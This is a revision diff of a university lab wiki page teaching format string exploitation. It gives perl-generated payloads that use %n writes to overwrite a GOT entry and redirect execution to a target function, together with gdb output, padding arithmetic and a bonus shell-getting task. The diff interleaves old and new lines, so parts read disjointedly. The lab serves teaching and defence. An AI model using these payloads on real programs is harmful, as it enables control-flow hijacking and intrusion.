-(gdbx/x 0x0804a004 +    PIE     No PIE (0x8048000
-0x804a004 <​fwrite@got.plt>: 0x08048396 +[+] Starting local process './​format'​pid 29030 
-(gdb) x/x 0x0804a008 +[*] Switching to interactive mode 
-0x804a008 <​puts@got.plt>:​ 0x02020202 +[*] Process './​format'​ stopped with exit code 0 (pid 29030
-(gdbx/x 0x0804a00c +\x14\x04\x15\x04\x17\x04\x18\x04 804c014 ​ 804c015 ​ 804c017 ​ 804c018 AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..
-0x804a00c <​__gmon_start__@got.plt>:​ 0x08000006 +This is the most useless and insecure program!
-(gdb) +
 </​code>​ </​code>​
  
-In the gdb session above you can see: +The output ​starts with ''​\x14\x04\x15\x04\x17\x04\x18\x04 804c014 ​ 804c015 ​ 804c017 ​ 804c018''​ which is the 4 addresses ​we have written (raw, little endian) followed by the numerical prints done with ''​%x''​ of the same addresses.
-  - the got entry for printf points to a library address (the address ​starts with 0xf) +
-  - the got entry for fwrite points to some code inside the binary. This means that the function wasn't yet called, the loader didn't load this address yet. +
-  - the puts entry points to 0x02020202. This is the value that we wrote.+
  
-**How come we wrote the first ''​0x02''​?** +If you have the same output it means that now, if you replace ​''​%x'' ​with ''​%n''​ (change ''​fmt ​write_fmt''​ in the script) it will try to write something at those valid addresses.
-Just before executing the first ''​%n'' ​the vulnerable code printed 770 (4*4+498+256) bytes and hex(770) ​== 0x302.+
  
-**How come the rest of the bytes are ''​0x02''?​** +We want to put the value ''​0x080491a6''​.
-After executing the first ''​%n''​ we printed another 256 bytes before each ''​%n''​ so we actually wrote 0x402, 0x502 and 0x602. You can see that the last three bytes ''​%%__gmon_start__@got.plt%%''​ are ''​0x000006''​. +
- +
-We want to put the value ''​0x08048494''​.+
 <code bash> ​ <code bash> ​
 $ objdump -d ./format | grep my_evil $ objdump -d ./format | grep my_evil
-08048494 ​<​my_evil_func>:​ +080491a6 ​<​my_evil_func>:​
-</​code>​ +
-The first byte is ''​0x94''​ (little endian), recall that we were able to write ''​0x02'',​ writing ''​0x94''​ means replacing first 255 with 255-(0x102-0x94) == 145. +
-<code bash> +
-$ ./format "​$(perl -e '​printf "​\x08\xa0\x04\x08"​. "​\x09\xa0\x04\x08"​ . "​\x0a\xa0\x04\x08"​. "​\x0b\xa0\x04\x08"​ . "​A"​x498 . "​%%145x|"​ . "​%%126\$08n"​ . "​%%255x|"​ . "​%%127\$08n"​ . "​%%255x|"​ . "​%%128\$08n"​ . "​%%255x|"​ . "​%%129\$08n"'​)"​ +
-$ gdb ./format -c core +
-#0  0x94949494 in ?? () +
-(gdb) quit +
-</​code>​ +
-The next byte that we want to write is ''​0x84''​ so we need to replace 255 with 235. We can continue this idea until we profit. +
-<code bash> +
-$ ./format "​$(perl -e '​printf "​\x08\xa0\x04\x08"​. "​\x09\xa0\x04\x08"​ . "​\x0a\xa0\x04\x08"​. "​\x0b\xa0\x04\x08"​ . "​A"​x498 . "​%%145x|"​ . "​%%126\$08n"​ . "​%%239x|"​ . "​%%127\$08n"​ . "​%%127x|"​ . "​%%128\$08n"​ . "​%%259x|"​ . "​%%129\$08n"'​)"​ | tr -s ' ' > /dev/null +
-I'm evil, but nobody calls me :-(+
 </​code>​ </​code>​
 +<note important>​
 +As ''​%n''​ writes how many characters have been printed until it is reached, each ''​%n''​ will print an incrementally larger value.
 +We use the 4 adjacent adressess to write byte by byte and use overflows to reach a lower value for the next byte.
 +For example, after writing ''​0xa6''​ we can write ''​0x0191'':​
 +
 +{{cns:​labs:​bytes_write.png?​500}}
 +
 +Also, the ''​%n''​ count doesn'​t reset so, if we want to write ''​0xa6''​ and then ''​0x91''​ the payload should be in the form of:
 +
 +''<​0xa6 bytes>​%n<​0x100 - 0xa6 + 0x91 bytes>​%n''​
 +
 +As mentionet earlier above, instead writing N bytes ''"​A"​ * N''​ you can use other format strings like ''​%Nc''​ or ''​%Nx''​ to keep the payload shorter.
 +</​note>​
  
 **[1p] Bonus task** Can you get a shell? (Assume ASLR is disabled). **[1p] Bonus task** Can you get a shell? (Assume ASLR is disabled).
Line 587: Line 546:
   * Pidgin off the record plugin [[http://​www.cvedetails.com/​cve/​CVE-2012-2369|CVE-2012-2369]]. The fix is [[https://​bugzilla.novell.com/​show_bug.cgi?​id=762498#​c1|here]]   * Pidgin off the record plugin [[http://​www.cvedetails.com/​cve/​CVE-2012-2369|CVE-2012-2369]]. The fix is [[https://​bugzilla.novell.com/​show_bug.cgi?​id=762498#​c1|here]]
  
 +===== Resources =====
 +
 +  * [[http://​www.cert.org/​books/​secure-coding/​|Secure Coding in C and C++]]
 +  * [[http://​www.informit.com/​articles/​article.aspx?​p=2036582|String representation in C]]
 +  * [[https://​www.owasp.org/​index.php/​Improper_string_length_checking|Improper string length checking]]
 +  * [[http://​cwe.mitre.org/​data/​definitions/​134.html|Format String definition]],​ [[https://​www.owasp.org/​index.php/​Format_string_attack|Format String Attack ​ (OWASP)]], [[http://​projects.webappsec.org/​w/​page/​13246926/​Format%20String|Format String Attack (webappsec)]]  ​
 +  * [[http://​www.gratisoft.us/​todd/​papers/​strlcpy.html|strlcpy and strlcat - consistent, safe, string copy and concatenation.]] This resource is useful to understand some of the string manipulation problems.
cns/labs/lab-07.txt · Last modified: 2022/11/21 14:29 by mihai.dumitru2201
CC Attribution-Share Alike 3.0 Unported
www.chimeric.de Valid CSS Driven by DokuWiki do yourself a favour and use a real browser - get firefox!! Recent changes RSS feed Valid XHTML 1.0